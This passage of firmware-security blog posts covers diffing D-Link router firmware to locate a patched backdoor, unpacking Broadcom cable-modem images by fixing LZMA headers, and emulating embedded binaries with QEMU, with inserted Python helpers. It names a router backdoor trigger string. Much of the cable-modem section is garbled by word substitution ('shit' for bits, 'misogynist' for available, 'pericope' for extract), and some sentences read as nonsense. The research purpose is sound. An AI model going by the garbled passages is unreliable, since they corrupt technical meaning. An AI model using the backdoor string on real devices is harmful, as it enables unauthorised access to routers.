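    if not any(s1[i:i + 7] in s2 for i in range(len(s1) - 6)):   # no shared 7-char run: 0
        return 0
    score = _edit_distance(s1, s2) * SPAMSUM_LENGTH // (len(s1) + len(s2))
    score = 100 - 100 * score // SPAMSUM_LENGTH
    # short signatures (small files) cannot justify a high score, so cap it
    return min(score, bs // MIN_BLOCKSIZE * min(len(s1), len(s2)))


def similarity(h1: str, h2: str) -> int:
    """0..100 match score; signatures only compare at equal or adjacent block sizes."""
    if h1 == h2:
        return 100
    bs1, a1, b1 = h1.split(":")
    bs2, a2, b2 = h2.split(":")
    bs1, bs2 = int(bs1), int(bs2)
    if bs1 == bs2:
        return max(_score(a1, a2, bs1), _score(b1, b2, 2 * bs1))
    if bs1 == 2 * bs2:
        return _score(a1, b2, bs1)
    if bs2 == 2 * bs1:
        return _score(b1, a2, bs2)
    return 0


def diff_trees(tree_a, tree_b):
    """Binwally-style report {path: (status, score)} for two {path: bytes} trees.
    'match' means byte-identical content; 'differ' carries the fuzzy score."""
    report = {}
    for path in sorted(set(tree_a) | set(tree_b)):
        if path not in tree_a or path not in tree_b:
            report[path] = ("unique", None)
        elif tree_a[path] == tree_b[path]:
            report[path] = ("match", 100)
        else:
            report[path] = ("differ", similarity(fuzzy_hash(tree_a[path]), fuzzy_hash(tree_b[path])))
    return report


# Constructed sample trees: pseudo-random bytes stand in for compiled binaries.
_rng = random.Random(20131203)
def _rand(n): return bytes(_rng.getrandbits(8) for _ in range(n))
OLD_WEBS = _rand(4096)
PATCHED_WEBS = OLD_WEBS[:2000] + bytes([OLD_WEBS[2000] ^ 0xFF]) + OLD_WEBS[2001:]   # one-byte silent patch
FIRMWARE_OLD = {"bin/webs": OLD_WEBS, "bin/busybox": _rand(4096), "etc/passwd": b"root:x:0:0::/:/bin/sh\n"}
FIRMWARE_NEW = {"bin/webs": PATCHED_WEBS, "bin/busybox": _rand(4096),   # rebuilt, unrelated bytes
                "etc/passwd": b"root:x:0:0::/:/bin/sh\n", "etc/wdhttp.sh": b"#!/bin/sh\n"}

if __name__ == "__main__":
    for path, (status, score) in diff_trees(FIRMWARE_OLD, FIRMWARE_NEW).items():
        print(f"{status:7} {score if score is not None else '-':>4} {path}")
```

Two properties of the algorithm show up directly in the report: the patched webs binary still scores in the 90s because only the piece containing the changed byte (and at most a trigger decision within seven bytes of it) is affected, while the rebuilt busybox scores 0 because its signature shares no seven-character run with the old one, which is the same reason Binwally reported 0 for the real /bin/webs pair below.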
It's important to note that files with a "match" result actually have the same content and also get a matching score of 100.<br /><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-e8MIRPZqZcc/Up0YYvMMmpI/AAAAAAAAAMc/Lepa21gT51Y/s1600/wingerge1.png"><img height="292" src="http://4.bp.blogspot.com/-e8MIRPZqZcc/Up0YYvMMmpI/AAAAAAAAAMc/Lepa21gT51Y/s640/wingerge1.png" width="640" /></a></div><br />
There's a new shell script in the patched 1.14 firmware, located at "/etc/wdhttp.sh". It seems that Joel "do not know how to write bash loop command ugly code":<br /><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-f6BtyU1iIrw/Up0FZOhy4pI/AAAAAAAAALU/uSiLlCdklXY/s1600/wdhttp.png"><img height="339" src="http://3.bp.blogspot.com/-f6BtyU1iIrw/Up0FZOhy4pI/AAAAAAAAALU/uSiLlCdklXY/s640/wdhttp.png" width="640" /></a></div><br />
Busybox was another binary with a different pattern. <a href="http://w00tsec.blogspot.com/2013/09/analyzing-and-running-binaries-from.html">Running both using QEMU</a> shows that they still have the same version (v1.0.0-pre2) but different compile dates (2011.09.15 and 2013.10.31).<br /><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-WVztAxv-x4w/Up0AOWoukPI/AAAAAAAAAK0/6zc8GdZJX6Y/s1600/busy1.png"><img height="332" src="http://4.bp.blogspot.com/-WVztAxv-x4w/Up0AOWoukPI/AAAAAAAAAK0/6zc8GdZJX6Y/s640/busy1.png" width="640" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-wrllS-64sPc/Up0AOZGa1iI/AAAAAAAAALA/gjoc6Tm2twk/s1600/busy2.png"><img height="332" src="http://3.bp.blogspot.com/-wrllS-64sPc/Up0AOZGa1iI/AAAAAAAAALA/gjoc6Tm2twk/s640/busy2.png" width="640" /></a></div><br />
According to the analysis from devttys0, the binary "/bin/webs" contained the backdoor function (if you have not read his analysis yet, <a href="http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/">read it here</a>). Binwally returned a match score of 0 because it was unable to find similar patterns. The binaries have different sizes and were probably compiled using different toolchains, so they contain different offsets, as displayed in the diff from WinMerge:<br /><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-hxD0xryNV90/Up0B6PyRkuI/AAAAAAAAALI/7BlTHZkVTic/s1600/winmerge.PNG"><img height="300" src="http://2.bp.blogspot.com/-hxD0xryNV90/Up0B6PyRkuI/AAAAAAAAALI/7BlTHZkVTic/s640/winmerge.PNG" width="640" /></a></div><br />
Binwalk from v1.3.0 beta onwards <a href="http://binwalk.org/3d-data-visualizations/">displays 3D binary data visualizations</a>, so let's have a look at how they differ in a 3D plane:<br /><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-qUNz66lJ3hk/Up1aztN7g3I/AAAAAAAAAM4/FDaD4tQGrog/s1600/3d.gif"><img src="http://1.bp.blogspot.com/-qUNz66lJ3hk/Up1aztN7g3I/AAAAAAAAAM4/FDaD4tQGrog/s1600/3d.gif" /></a></div><br />
It's time to use an approach other than byte comparison and fuzzy hashing. Bindiff uses a graph-theoretical approach to compare executables by identifying identical and similar functions. We first need to analyze both files with IDA to create the needed IDB files. After loading both files into bindiff, we notice a high level of similarity in the Call Graphs:<br /><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-C8GuCFg0Wxk/Up0OLJFb6eI/AAAAAAAAALk/o6ZsTKWzccY/s1600/bindiff1.png"><img height="433" src="http://2.bp.blogspot.com/-C8GuCFg0Wxk/Up0OLJFb6eI/AAAAAAAAALk/o6ZsTKWzccY/s640/bindiff1.png" width="640" /></a></div><br />
Let's focus on the previously backdoored function "alpha_auth_check":<br /><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-qfU4cMGcn5U/Up0OmJHXmwI/AAAAAAAAALs/rIX9FIxpbAA/s1600/bindiff2.png"><img height="226" src="http://4.bp.blogspot.com/-qfU4cMGcn5U/Up0OmJHXmwI/AAAAAAAAALs/rIX9FIxpbAA/s640/bindiff2.png" width="640" /></a></div><br />
We can easily spot the difference by displaying the flow graph:<br /><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-3aW8RXWeVTE/Up0QNb5nQWI/AAAAAAAAAL4/u6KMvfjpBjg/s1600/bindiff3.png"><img height="427" src="http://4.bp.blogspot.com/-3aW8RXWeVTE/Up0QNb5nQWI/AAAAAAAAAL4/u6KMvfjpBjg/s640/bindiff3.png" width="640" /></a></div><br />
Zooming in (courtesy of NSA):<br /><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-zmRPtCYsnJ8/Up0cNUJAyEI/AAAAAAAAAMo/TFKxXDoB-5I/s1600/bindiff4.png"><img height="428" src="http://2.bp.blogspot.com/-zmRPtCYsnJ8/Up0cNUJAyEI/AAAAAAAAAMo/TFKxXDoB-5I/s640/bindiff4.png" width="640" /></a></div><br /><br />
It seems that Joel's "xmlset_roodkcableoj28840ybtide" is gone; say hello to "iNteLalsEtvaLuewitHoutnAme". And yes, it seems that Joel (and the binaries that can re-configure the device's settings) can only access the device from 127.0.0.1 now =)<br /><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-wGnmdvTQNoY/Up0SgEl3k-I/AAAAAAAAAMM/P-DekGIHreM/s1600/bindiff5.png"><img height="329" src="http://2.bp.blogspot.com/-wGnmdvTQNoY/Up0SgEl3k-I/AAAAAAAAAMM/P-DekGIHreM/s640/bindiff5.png" width="640" /></a></div><br />
<b>Conclusion</b><br /><br />
Binary and directory tree diffing is a powerful tool for reverse engineering and for finding a potential compromise of a system, as long as you have a "known template". In the context of embedded systems, it reveals modified files, settings and directories, narrowing the analysis down to a small set of data when comparing different firmware images.<br /><br />
To all the vendors out there: it's important to be transparent about what's being fixed, alerting end users to how critical the issues are. And please, leave the backdooring job to the guys who "<a href="http://www.youtube.com/watch?v=jMUbz4u5_NQ">read the constitution</a>" and are paid for that, OK?<br /><br />
Bernardo Rodrigues (http://www.blogger.com/profile/09470949514402700579)<br /><br />
Published 2013-11-11T11:16:00.001-02:00, updated 2014-01-08T23:57:00.823-02:00<br /><br />
<b>Unpacking Firmware Images from Cable Modems</b><br /><br />
Hacking cable modems used to be very popular during the early 2000's.
People like <a href="http://books.google.com.br/books?hl=pt-BR&amp;id=PblPcRqHM0wC">DerEngel </a>and <a href="http://isabel.la/">Isabella</a> from TCNiSO carried lots of research on the topic and talks from bitemytaco (R.I.P) and BlakeSelf during <a href="https://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-self.pdf">DEFCON 16</a> and <a href="https://www.defcon.org/images/defcon-18/dc-18-presentations/Blake-bitemytaco/DEFCON-18-Blake-bitemytaco-Hacking-DOCSIS.pdf">DEFCON 18</a> covered lots of information on the subject.<br /><br />Securing subscription modems is increasingly difficult than other embedded devices because, on most cases, you can’t segregate your own device/firmware and software updates are scrutinizingly entirely controlled by your ISP. Most subscription modems offer a limited legalistic interface and management commands are sent using SNMP.<br /><br /><b>Cable Modem Firmware</b><br /><br />There are basically three types of firmware images for subscription modems:<br /><br />- Signed and compresed (PKCS#7 &amp; binary)<br />- Compressed binary images<br />- RAM dump images (uncompressed &amp; raw)<br /><br /><div class="separator" style="clear: both; text-align: center;"></div>You can dump your own firmware image using <a href="http://www.usbjtag.com/">JTAG</a> or sniffing the connection during upgrades, for example. I’m a big fan of <a href="https://code.google.com/p/binwalk/">binwalk</a> and I unchangingly wondered why it doesn't unpack firmwares from popular Broadcom based subscription modems so I decided to research on this.<br /><br /><b>Unpacking the Firmware</b><br /><br />For this wringer I’ll use <a href="http://www.cisco.com/web/consumer/support/modem_DPC3925.html">Cisco DPC3925</a>, which is a very worldwide DOCSIS 3.0 modem here in Brazil. 
Cisco DPC3925 has a <a href="http://datasheet.elcodis.com/pdf/48/45/484522/bcm3380dkfsbg.pdf">BCM3380</a> chipset, 16MBWinkx 64MB DRAM memory configuration.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-Kp_e-a2o8MM/UnxDPkDu6jI/AAAAAAAAAHg/Ez5QsVnZaEA/s1600/dpc3925.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-Kp_e-a2o8MM/UnxDPkDu6jI/AAAAAAAAAHg/Ez5QsVnZaEA/s320/dpc3925.png" height="146" width="320" /></a><a href="http://4.bp.blogspot.com/-NisV_3s_QBA/UnxDPdKo81I/AAAAAAAAAHc/Gv8v5CALI3Y/s1600/bcm3380.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-NisV_3s_QBA/UnxDPdKo81I/AAAAAAAAAHc/Gv8v5CALI3Y/s200/bcm3380.png" height="185" width="200" /></a></div><br />The compressed firmware image has virtually 4MB. Using strings versus the file didn't help much and binwalk v1.2.1 (without any spare parameters) did not recognize it.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-vjLXMoM_nJ8/Unxfkex5WCI/AAAAAAAAAHs/uU7NkimPrHM/s1600/binwalk1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-vjLXMoM_nJ8/Unxfkex5WCI/AAAAAAAAAHs/uU7NkimPrHM/s400/binwalk1.png" height="161" width="400" /></a></div><br />We can gather lots of useful information from the vendor’s page: user guides, datasheets, licensing information and unshut source disclaimer for the product. 
There are no sources misogynist on Cisco's home, but the <a href="http://www.cisco.com/en/US/docs/video/at_home/Cable_Modems/3000_Series/7022138_A.pdf">Copyright Notices section</a> states that the product uses LZMA SDK 4.21.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-eDt_IXK-cvg/UnxDOmbbIXI/AAAAAAAAAHQ/A2HHnzQfQ90/s1600/firm2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-eDt_IXK-cvg/UnxDOmbbIXI/AAAAAAAAAHQ/A2HHnzQfQ90/s320/firm2.png" height="320" width="278" /></a></div><br />So we know that the firmware is probably packed using LZMA but we still need to icon out how to unpack it. Binwalk -i displays results marked as invalid during the scan and we might get some clue:<br /><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-UBWZcmPW2iA/UnxfkZT91lI/AAAAAAAAAH4/EUyOa30cra8/s1600/binwalk2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-UBWZcmPW2iA/UnxfkZT91lI/AAAAAAAAAH4/EUyOa30cra8/s400/binwalk2.png" height="187" width="400" /></a></div><div><br /></div><div>The LZMA header is not well documented. 
There are some good resources on&nbsp;<a href="https://github.com/cscott/lzma-purejs/blob/master/FORMAT.md">lzma-purejs Github</a>&nbsp;and you&nbsp;can moreover trammels binwalk's <a href="https://code.google.com/p/binwalk/source/browse/trunk/src/magic/lzma">magic file signatures</a> (<a href="https://twitter.com/devttys0">devttys0</a> once did all the nonflexible work for us).<br /><br /><div class="code" style="background-color: #f5f8fa; background-repeat: no-repeat no-repeat; border-color: rgb(153, 34, 17); border-style: solid; border-width: 1px 1px 1px 20px; margin: 10px 0px 10px 10px; max-height: 200px; min-height: 10px; overflow: auto; padding: 5px; width: 592.1875px;"><span style="background-color: transparent; line-height: 16px;"><span style="font-family: Courier New, Courier, monospace;">&nbsp; Offset Size &nbsp;Description</span></span><br /><span style="font-family: Courier New, Courier, monospace;"><span style="line-height: 16px;">&nbsp; &nbsp; 0 &nbsp; &nbsp; 1 &nbsp; &nbsp;lc, lp and pb in encoded form</span></span><br /><span style="font-family: Courier New, Courier, monospace;"><span style="line-height: 16px;">&nbsp; &nbsp; 1 &nbsp; &nbsp; 4 &nbsp; &nbsp;dictSize (little endian)</span></span><br /><span style="font-family: Courier New, Courier, monospace;"><span style="line-height: 16px;">&nbsp; &nbsp; 5 &nbsp; &nbsp; 8 &nbsp; &nbsp;uncompressed size (little endian)</span></span></div><div><br /></div>The Bootloader in the beggining of the wink contains the necessary information to marching the firmware image. 
On the top of the firmware there's unchangingly an extractor which decompress the firmware into DRAM.<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-jkf32ZsZQK8/UnxDMrnT5zI/AAAAAAAAAHI/OpFMDcSNVa8/s1600/firm1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-jkf32ZsZQK8/UnxDMrnT5zI/AAAAAAAAAHI/OpFMDcSNVa8/s400/firm1.png" height="323" width="400" /></a></div><br />Offset 0x677 is a good candidate considering it's located in the whence of the file and it seems to have a valid header. 5D 00 00 00 01 indicates a LZMA pinch level of -8 and the next 64 shit should be the data's uncompressed size (in little endian).</div><div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-DMH6RMw9Omc/UnxpturB6HI/AAAAAAAAAIE/Qkp1Ng6tq54/s1600/offset.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-DMH6RMw9Omc/UnxpturB6HI/AAAAAAAAAIE/Qkp1Ng6tq54/s640/offset.png" height="315" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>The 64 shit pursuit the header (00 20 20 0E 3A 28 AB EF) is unmistakably not a valid uncompressed size (2898643604054482944 bytes). It represents the very compressed data, making binwalk and 7zr unable to pericope it.<br /><br />What we need to do here is suspend a few uneaten bytes to the header so our regular 7zr binary can recognize and pericope the data. We don't know the uncompressed size for the firmware yet: the good news is that we can suspend and specify a big value here, permitting 7zr utility to unpack it (although weeping that the EOF was reached too early). Let's specify 268435456 bytes (256MB), convert it to little endian (00 00 00 10 00 00 00 00) and suspend it to the original LZMA header. The new header should be something like ... 
5D 00 00 00 01 00 00 00 10 00 00 00 00 00 20 20 ...<br /><br />I took the opportunity to have a look at binwalk's <a href="https://code.google.com/p/binwalk/wiki/API">API</a> and wrote a simple <a href="https://github.com/bmaia/lzma-unpacker">lzma-unpacker.py</a>:<br /><br /><script src="https://gist.github.com/bmaia/f095fde8cde3dcd2c74b.js"></script> This code will probably be obsolete in a couple of days, because I'm pretty sure binwalk will incorporate this (a plugin maybe?).<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-nXdE3Riusdw/Un5ICQNw93I/AAAAAAAAAIU/BZYzsoT3Les/s1600/screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-nXdE3Riusdw/Un5ICQNw93I/AAAAAAAAAIU/BZYzsoT3Les/s640/screenshot.png" height="394" width="640" /></a></div><br />The data was extracted successfully and contains&nbsp;21982740 bytes. If we replace the uncompressed size in the LZMA header with the correct value in little endian (14 6E 4F 01 00 00 00 00), the 7zr tool no longer complains about the file's integrity.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-4-rodBGKNGw/Un5n7qWG0WI/AAAAAAAAAJU/zGtgEpNSStE/s1600/screenshot2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-4-rodBGKNGw/Un5n7qWG0WI/AAAAAAAAAJU/zGtgEpNSStE/s640/screenshot2.png" height="469" width="640" /></a></div><br />Most Broadcom cable modems are packed this way, including the ones manufactured by different vendors. 
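The header surgery described above, as an added example that is not the post's lzma-unpacker.py: a small Python 3 helper that decodes the 5-byte properties header, inserts the missing 8-byte size field and decompresses with the standard library's lzma module (liblzma underneath, not 7zr). The sample stream is constructed inline by compressing test data and stripping bytes 5..12, to stand in for the Broadcom bootloader payload; the constants, function names and sample text are this example's own.

```python
import lzma
import struct

# LZMA_Alone header layout (the one 7zr and lzma-purejs describe):
#   offset 0, 1 byte : lc, lp, pb packed as (pb * 5 + lp) * 9 + lc
#   offset 1, 4 bytes: dictionary size, little endian
#   offset 5, 8 bytes: uncompressed size, little endian; all 0xFF = unknown,
#                      in which case the stream ends with an end-of-payload marker
UNKNOWN_SIZE = 0xFFFFFFFFFFFFFFFF


def parse_header(blob):
    """Decode the 5-byte properties header at the start of blob."""
    props, dict_size = struct.unpack_from("<BI", blob, 0)
    if props >= 9 * 5 * 5:
        raise ValueError("invalid LZMA properties byte 0x%02x" % props)
    return {"lc": props % 9, "lp": (props // 9) % 5, "pb": props // 45,
            "dict_size": dict_size}


def insert_size_field(blob, size=None):
    """Turn '5-byte header + compressed data' (the firmware layout) into a
    13-byte-header LZMA_Alone stream by inserting the uncompressed-size
    field after the properties. size=None writes the 'unknown' marker."""
    value = UNKNOWN_SIZE if size is None else size
    return blob[:5] + struct.pack("<Q", value) + blob[5:]


def set_size_field(blob, size):
    """Overwrite the size field of a stream that already has the 13-byte
    header (what the post does once the real length, 21982740, is known)."""
    return blob[:5] + struct.pack("<Q", size) + blob[13:]


def unpack(blob):
    """Decompress a 13-byte-header stream with liblzma.
    Returns (data, complete): complete is False when the input ran out before
    the end-of-payload marker, liblzma's counterpart of 7zr's early-EOF warning."""
    dec = lzma.LZMADecompressor(format=lzma.FORMAT_ALONE)
    data = dec.decompress(blob)
    return data, dec.eof


# Constructed sample (not firmware data): compress test data the normal way,
# then drop bytes 5..12 so it looks like the Broadcom payload at offset 0x677.
SAMPLE = b"".join(b"w00tsec firmware test block %d\n" % i for i in range(400))
FULL = lzma.compress(SAMPLE, format=lzma.FORMAT_ALONE)
SIZELESS = FULL[:5] + FULL[13:]


def demo():
    """Repair the sample stream and return (header, data, complete)."""
    header = parse_header(SIZELESS)
    data, complete = unpack(insert_size_field(SIZELESS))
    return header, data, complete


if __name__ == "__main__":
    header, data, complete = demo()
    print(header, len(data), complete)
```

liblzma ties the end-marker rule to the size field: all 0xFF means "unknown, the stream ends with an end-of-payload marker", so a stream that simply stops (no marker, as a size-terminated firmware payload would) decodes completely but comes back with complete=False. That is the same "EOF reached too early" condition the post sees in 7zr, and the output is still usable. Once the real length is known, set_size_field writes it back, as the post does with 14 6E 4F 01 00 00 00 00.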
The lzma-unpacker.py script was fully tested and works fine for the following models:<br /><br />&nbsp; - Cisco DPC3925, DPC2434<br />&nbsp; - Motorola SB5100, SB5101, SVG6582, SVG1202<br />&nbsp; - Thomson ACG905, DCM425, DHG534, DHG544, DWG850, DWG874<br />&nbsp; - Webstar DPC2203<br /><br /><b>Firmware Analysis</b><br /><br />Now that you have successfully unpacked the firmware, here are a couple of cool things you should do:<br /><br />- Find default passwords<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-BzZuGG8t3W8/Un5gw8HfNDI/AAAAAAAAAIk/fpecYpIN5Ik/s1600/defaultpw.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-BzZuGG8t3W8/Un5gw8HfNDI/AAAAAAAAAIk/fpecYpIN5Ik/s640/defaultpw.PNG" height="288" width="640" /></a></div><br />- Find backdoors<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-sLiRf9L6UrY/Un5g3xBji4I/AAAAAAAAAIs/q5Kbdc4vSXY/s1600/backdoor.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-sLiRf9L6UrY/Un5g3xBji4I/AAAAAAAAAIs/q5Kbdc4vSXY/s640/backdoor.png" height="252" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-zmTAhOZUcLY/Un58udqpgbI/AAAAAAAAAJk/B0sI_eSkTdo/s1600/backdoor2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-zmTAhOZUcLY/Un58udqpgbI/AAAAAAAAAJk/B0sI_eSkTdo/s640/backdoor2.png" height="344" width="640" /></a></div><br />- Pentest the Web Application<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-vOBSIUCeXrA/Un5g8SQlTQI/AAAAAAAAAI0/6hSkCf9VH6M/s1600/carving.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" 
src="http://2.bp.blogspot.com/-vOBSIUCeXrA/Un5g8SQlTQI/AAAAAAAAAI0/6hSkCf9VH6M/s640/carving.png" height="394" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-yFlUqmfBlUI/Un5jNkepAYI/AAAAAAAAAJA/9lfm3qWfNxQ/s1600/carving2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-yFlUqmfBlUI/Un5jNkepAYI/AAAAAAAAAJA/9lfm3qWfNxQ/s320/carving2.png" height="299" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-F-2MWNY0ENA/Un5jPxD3vDI/AAAAAAAAAJI/LJumjXRHaO8/s1600/carvin3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-F-2MWNY0ENA/Un5jPxD3vDI/AAAAAAAAAJI/LJumjXRHaO8/s640/carvin3.png" height="250" width="640" /></a></div><br />- Fingerprint your device and <a href="https://github.com/bonsaiviking/missing-os-fingerprints">submit it to NMAP</a><br /><br />- <a href="https://community.rapid7.com/community/infosec/sonar/blog/2013/10/27/estimating-readynas-exposure-with-internet-scans">Find similar devices</a> using the <a href="http://scans.io/">scans.io</a> dataset<br /><br />- Mail&nbsp;<a href="https://twitter.com/hdmoore">HD Moore</a> a copy of the firmware and wait for the <a href="https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities">CVE Spam</a><br /><br /></div>Bernardo Rodrigues<br /><br /><b>Analyzing and Running binaries from Firmware Images - Part 1</b> (2013-09-01)<br /><br />During the first part of <a href="http://w00tsec.blogspot.com.br/2013/08/simet-box-firmware-analysis-embedded.html">SIMET Box Firmware analysis</a>, we downloaded the firmware image, extracted its contents, 
compared it against the base OpenWrt image and found a couple of interesting files (SSH keys, binaries, init scripts, firewall rules and so on).<br /><br />For this part we'll focus on identifying binaries, comparing them and executing them to find interesting data. Whenever you're analyzing binaries from different architectures, there are a couple of nice tools that help with debugging, reversing and emulating their behavior, like objdump, readelf and QEMU.<br /><br /><a href="http://www.emdebian.org/">Embedded Debian Project</a>&nbsp;provides pre-built binary toolchains for mips, mipsel, arm, armel, powerpc, and a couple of other architectures. In order to download and install it on Debian based Linux distros, you have to apt-get its archive signing key:<br /><div class="code">sudo apt-get install emdebian-archive-keyring</div><br />Now you need to include their repository in your /etc/apt/sources.list: <br /><div class="code">deb http://www.emdebian.org/debian/ squeeze main</div><br />After apt-get update you can install binutils for your target archs:<br /><div class="code">sudo apt-get install binutils-mips-linux-gnu binutils-mipsel-linux-gnu &nbsp;binutils-arm-linux-gnueabi</div><br />For this little exercise I'll analyze three <a href="http://www.busybox.net/">busybox</a> binaries, from three different firm: busybox-simet (from <a href="http://w00tsec.blogspot.com.br/2013/08/simet-box-firmware-analysis-embedded.html">SIMET Box</a>), busybox-asuswrt (from <a href="https://github.com/RMerl/asuswrt-merlin">AsusWRT-Merlin firmware</a>) and busybox-sb6120 (from <a href="http://sourceforge.net/projects/sb6120.arris/">Motorola's SB6120 Surfboard cable modem</a>).<br /><br /><b>Architecture, Big-Endian or Little Endian?</b><br /><br />When analyzing SIMET Box we already knew that the device was based on the ar71xx platform, which is MIPS based and big endian as stated on <a href="https://dev.openwrt.org/wiki/platforms">OpenWRT's official page</a>. 
If you want to find it out on your own you can use the file utility:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-CBBg-SYPgZc/UiK5K5RnbYI/AAAAAAAAAEg/qt6RGLKteJY/s1600/bin1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="278" src="http://4.bp.blogspot.com/-CBBg-SYPgZc/UiK5K5RnbYI/AAAAAAAAAEg/qt6RGLKteJY/s640/bin1.png" width="640" /></a></div><br />Emdebian binutils also provide useful tools to extract further information from unknown binaries. A trick I use regularly is to display information from object files using different toolchains in order to find out which one understands the file structure properly. For example, objdump -f displays the contents of the overall file header.<br /><br /><ul><li>SIMET Box tl-wr740n-v4 (architecture: mips:isa32r2,&nbsp;file format elf32-tradbigmips)<br /></li></ul><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-1ze58Wix7S0/UiK9PuKdMjI/AAAAAAAAAEs/8AHyr9qKZcY/s1600/bin2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="520" src="http://4.bp.blogspot.com/-1ze58Wix7S0/UiK9PuKdMjI/AAAAAAAAAEs/8AHyr9qKZcY/s640/bin2.png" width="640" /></a></div><br /><ul><li>AsusWRT-Merlin v3.0.0.4.374.32 (architecture: mips:isa32 file format elf32-tradlittlemips)<br /></li></ul><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-M2d1cJ22l28/UiK-8tlEREI/AAAAAAAAAE4/Pdr7FKi54GY/s1600/bin3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="539" src="http://1.bp.blogspot.com/-M2d1cJ22l28/UiK-8tlEREI/AAAAAAAAAE4/Pdr7FKi54GY/s640/bin3.png" width="640" /></a></div><br /><ul><li>SB6120 v1.0.2.4-SCM01&nbsp;(architecture: arm,&nbsp;file format elf32-bigarm)<br /></li></ul><div class="separator" style="clear: both; text-align: center;"><a 
href="http://4.bp.blogspot.com/-cZiPotVK4Z8/UiLBJoi_E2I/AAAAAAAAAFE/ZJiIAdiAigY/s1600/bin4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="539" src="http://4.bp.blogspot.com/-cZiPotVK4Z8/UiLBJoi_E2I/AAAAAAAAAFE/ZJiIAdiAigY/s640/bin4.png" width="640" /></a></div><br />We now know each file's format/architecture and can proceed to emulate the binaries in a virtual environment using QEMU.<br /><br /><b>QEMU</b><br /><br />QEMU&nbsp;is a generic and open source machine emulator and virtualizer that supports architectures like MIPS, ARM and PowerPC. In order to set up and run single binaries with QEMU on Debian based Linux distributions, you need to install the <a href="https://wiki.debian.org/QemuUserEmulation">qemu-user-static</a> package.&nbsp;<a href="https://twitter.com/keith55">RogueAsian</a> and <a href="https://twitter.com/devttyS0">devttys0</a> detail these steps&nbsp;<a href="http://milo2012.wordpress.com/2011/12/18/reversing-lifesize-220-firmware/">here</a> and <a href="http://www.devttys0.com/2011/09/exploiting-embedded-systems-part-3/">here</a>.<br /><div class="code">sudo apt-get install qemu-user-static</div><br />It's important to run qemu in a chrooted environment to avoid mixing your target's libraries with those of your host system.<br /><br /><b>AsusWRT-Merlin v3.0.0.4.374.32</b><br /><br />Let's try this on AsusWRT's busybox first. We'll have to use qemu-mipsel-static because it's MIPS32 based and little endian.<br /><div><br /></div><div class="separator" style="clear: both; 